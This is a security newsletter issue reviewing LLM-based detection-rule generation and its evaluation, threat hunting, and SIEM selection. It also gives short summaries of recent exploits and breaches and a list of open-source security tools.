I’m glad to see more research and homelab-style blogs on how to build detection engineering agentic systems. It demystifies some of the hype surrounding products in this space, and just like Splunk did with SIEM by creating a community edition, it makes it easier for people to enter our field. I immediately clicked on this post because the title really excited me, and the post didn’t disappoint!

Consonni’s project here involves building out an LLM Agent system that translates threat intelligence into detection rules. They leveraged http://crewai.com/ (which I had never heard of), a platform that helps host AI Agents, provides an SDK for writing those agents, and makes it seem easy to focus on building the system rather than worrying about architecture and scale. Consonni started with a prompt that included the whole workflow of “read report → extract TTPs → create rules,” and it did a terrible job due to the broadness of the request. They refined the process with a multi-agent setup, some more specific prompting, and switching foundational models; the resulting rules were impressive.

More than “plausible nonsense”: A rigorous eval for ADÉ, our security coding agent by Bobby Filar and Dr. Anna Bertiger

This post is an EXCELLENT read after the LLM detection rule creator post by Consonni listed above.

Determining the performance of a machine learning model is as old as the field of statistics itself. The basic premise behind performance measurement is building a predictive system, testing it against real-world data, and measuring its performance efficacy. Sound familiar, like detection rules, right?

Naturally, LLMs should have the same type of evaluation criteria for implementers to trust and verify performance. I haven’t seen a comprehensive evaluation framework for detection rules until I came across this post by Filar and Dr. Bertiger. The Sublime team built a detection evaluation framework for their LLM-backed detection engineer, dubbed ADÉ. The idea here is that the team tried to encode success metrics for new detection rules written in the Sublime DSL. These success metrics should be familiar to long-time readers of this newsletter and to those who have read my Field Manual posts.

They split evaluations into three steps: precision, robustness, and cost to deploy and run. The lovely thing about these three evaluations is that they really capture how detection engineers think about testing rules before they deploy them.

Precision measures accuracy and net-new coverage, which, according to Filar and Dr. Bertiger, is the marginal value a rule adds when running alongside existing detections against known campaigns.
The robustness steps dissect the rules’ abstract syntax tree to identify and penalize lower-value detection mechanisms, such as IP matching. Think of this as penalizing the lower parts of the Pyramid of Pain
The cost step looks at how many times the model took to generate a production-quality rule, the time to deployment of that rule, and the runtime cost of the rule in production

They list evaluations of several rules towards the end of the post, and I’m impressed by their performance. They compare the results to a human-written rule, and it appears to have performed well in some detection types against humans but underperformed in others. However, the idea here (in my opinion) isn’t to replace humans, but to augment us, and I think this framework helps achieve that.

How to Create a Hunting Hypothesis by Deniz Topaloglu

The best way to threat hunt is to challenge assumptions. In my experience, these assumptions typically fall into several buckets, including:

Rules that fail to capture threat activity
Telemetry sources contain threat activity that we haven’t accounted for
Threat intelligence informs us of something we should be aware of in the pyramid of pain

Forming a hypothesis, then, takes assumptions and tries to challenge them to uncover gaps in rules or telemetry, and in the worst case, find an incident that you’ve missed. It’s a formulaic process, but this post shows how powerful threat hunting can be when you lay out your assumptions and what you know so you can deep dive into a hypothesis.

Topaloglu starts with a piece of threat intelligence, maps out potential TTPs in MITRE, shows an example network diagram, and then creates a hunting plan. They lay out several scenarios and their corresponding SIEM search queries in several languages, and continue on to post-hunt activities for aspiring hunters to follow up on because threat hunts should provide more value than just confirming whether activity is present or not in a network.

The Great SIEM Bake-Off: Is Your SOC About to Get Burned? by Matt Snyder

Choosing a SIEM is like selecting a business partner. You need to ensure that you understand the strengths and weaknesses of each other and create an operating model to compensate for them. It’s great to see a blog exploring the topic of procuring a SIEM and the pain associated with switching from one deployment to another. This piece is beneficial for aspiring analysts or detection and response engineers who’ve never been through this type of exercise, because it truly feels like a mountain to climb that can put your company and productivity at risk.

Snyder points out five key areas of concern where switching costs can kill productivity: ingest, search, enrichment, rules and administration. SIEM vendors should help you understand each component during a demo. Even then, many demos showcase the best parts of the technology, so a bake-off between SIEM vendors, via proofs of concept, and Snyder’s linked Maturity Tracker, can alleviate much of the uncertainty behind these exercises.

☣️ Threat Landscape

CrowdStrike Identifies Campaign Targeting Oracle E-Business Suite via Zero-Day Vulnerability (now tracked as CVE-2025-61882) by CrowdStrike

The large vulnerability news du jour is a remote code execution in Oracle E-Business Suite tracked under CVE-2025-61882. The CrowdStrike research team made this post detailing their observations as threat actors and researchers alike conduct mass exploitation to take advantage of the vulnerability.

The exploit chain involves a series of crafted payloads to two jsp endpoints, where an unauthenticated attacker uploads a malicious xslt file. This, in turn, creates an outbound Java request to an attacker-controlled command and control server to load a webshell on victim machines.

The remarkable aspect here is how the exploit was disseminated. Oracle made a public post with IOCs, a PoC was posted on October 3, and according to CrowdStrike, threat actors under the ShinyHunters moniker posted an exploit file to their main Telegram channel.

Red Hat Consulting breach puts over 5000 high profile enterprise customers at risk — in detail by Kevin Beaumont

Red Hat Consulting, the technology services arm of Red Hat, allegedly suffered a data breach from a threat actor group dubbed “Crimson Collective.” It’s unclear how this breach happened, but they began posting screenshots of the pilfered victim data. Beaumont uncovered some interesting details about this threat actor group, thanks to the assistance of Brian Krebs. They seem to overlap with Scattered Spider/Shiny Hunters, and one of the Telegram posts made by the group had a “Miku” signature at the end. Miku is an alleged member of Scattered Spider and was arrested last year, but is on house arrest.

The victim details were posted on the Scattered LAPSUS$ Hunters victim leak site, and it appears to contain a trove of customer data from Red Hat Consulting, including some sensitive information.

DPRK IT Workers: Inside North Korea’s Crypto Laundering Network by Chainalysis

My favorite thing about reading Chainalysis blogs is getting a glimpse into how money laundering works at a cryptocurrency scale. Unless you’re a freak of nature and read indictments or court documents with detailed notes on traditional money laundering techniques, it’s rare to see how criminal and nation-state operations do the hard work of funneling money.

So, in this blog, the Chainalysis team studied the tactics, techniques and procedures of DPRK IT Worker laundering. They have a structured approach to taking payment in stablecoins, laundering it to a “consolidation” worker, and eventually offloading the consolidated funds to fiat.

Don’t Sweat the *Fix Techniques by Tyler Bohlmann

When I first read about ClickFix, I didn’t think it would be a successful approach to infection and initial access. The premise was a bit crazy: you funnel victims to a website, socially engineer them to believe there’s a problem with their computer, and convince them to willingly copy and paste a malicious command into their terminal.

Well I was wrong; this technique works beautifully, and according to Bohlmann, Huntress has observed a 600%+ increase in these styles of attack since their inception last year. In this post, they review the different styles of ClickFix, the attack chains and how they use clever ways to trick users to running the malicious payloads.

🔗 Open Source

1337-42/FlipSwitch-dev

Sprooten’s FlipSwitch PoC repo is referenced in the Gem above. It does more than just demonstrate the technique; you can use this as a rootkit kernel module in the latest versions of the Linux Kernel, and it supports some fun obfuscation techniques to make it harder to find.

ti-to-sigma-crew

Threat intelligence report to Sigma rule generator. This repository is based on the research linked above by Consonni. It looks pretty easy to use a templated CrewAI application, add knowledge files like detection rules as examples, and it looks like a SQLite database for RAG components.

matt-snyder-stuff/Security-Maturity-Tracking

Simple yet effective security maturity tracking framework for a security operations program. The repository lists each capability you want to track, such as SIEM, Threat Hunting and Threat Intelligence, and you can create maturity matrices for each one and track progress. These are generally pretty good at presenting up to leadership on program development.

thalesgroup-cert/suspicious

Open-source anti-phishing and investigation application for investigators, analysts and CERT folks. You set it up, tie it to an inbox, have users forward suspicious emails to it, and it’ll pull apart the email, perform threat intel lookups and present a report for further analysis.

CERT-Polska/karton

A dynamic malware analysis platform where you can build malware processing backends all in Python. It comes with several backends out of the box, including a malware sandbox, an archive extractor, and a malware configuration extractor. It looks pretty easy to write your own, and you can submit it via an API or the dashboard to extend functionality.